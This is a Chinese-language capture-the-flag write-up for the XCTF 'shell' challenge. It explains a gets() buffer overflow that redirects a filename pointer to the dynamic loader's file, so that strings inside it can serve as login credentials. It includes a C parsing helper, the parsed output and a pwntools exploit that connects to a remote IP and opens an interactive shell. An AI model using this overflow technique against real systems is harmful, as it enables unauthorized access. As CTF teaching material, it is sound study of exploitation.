XCTF-shell-WP
一道 8 分题,其实也没多难,就是思路很骚。我没想到,着实可惜。
读入全部使用 gets
,随便溢出。我们需要的是把 v16
置为 1,自然的思路是通过溢出实现,但是做不到,我们能溢出的全部在它下面,所以只能尝试通过 login
的验证。
nc
一下服务器 ls
,发现根本没有 creds.txt
这个文件,再考虑到 filename
这个变量是可以通过溢出来修改的,题目提供了一个 ld
,就可以尝试修改 filename
,使它指向 /lib64/ld-linux-x86-64.so.2
这个字符串。在程序中是有这个字符串的。
那么我们只要模拟一下对 ld-linux-x86-64.so.2
的读取就可以获得用户名和密码了。
获取用户名和密码
#include <cstdio>
#include <cstring>
char c[10000000];
char *user;
char *pass;
int main()
{
FILE* p;
p = fopen("./ld-linux-x86-64.so.2","r");
while(!feof(p))
{
fgets(c,10000000,p);
user = strtok(c,":");
pass = strtok(NULL,":");
if(user != NULL && pass != NULL)
{
printf("username:");
puts(user);
printf("password:");
puts(pass);
}
}
return 0;
}
获得的数据
username:ֻ$=uTi7J��GC���p�T��B���#d�<I�Xx�k߱;��k�<��sB�Ҋ|F
password:m�<�9
ܹןkC(�����F�
username: Version information
password:
username:prelink checking
password: %s
username:relocation processing
password: %s%s
username:calling init
password: %s
username:calling preinit
password: %s
username:calling fini
password: %s [%lu]
username:conflict processing
password: %s
username:runtime linker statistics
password:
username: total startup time in dynamic loader
password: %s
username: number of relocations from cache
password: %lu
username: number of relative relocations
password: %lu
username:WARNING
password: Unsupported flag value(s) of 0x%x in DT_FLAGS_1.
username: entry
password: 0x%0*lx phdr
username:runtime linker statistics
password:
username: final number of relocations
password: %lu
username:final number of relocations from cache
password: %lu
第三组就很不错,所以有
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh = remote("111.200.241.244",42409)
#sh = process("./shell")
u_p = open("./u_p")
name = "prelink checking\x00"
password = " %s\x00"
sh.sendlineafter("$ ",'login')
sh.sendlineafter("Username: ",name)
payload = password.ljust(0x5c - 0x18,'\x00') + p64(0x400200)
sh.sendlineafter("Password: ",payload)
sh.interactive()
好简短。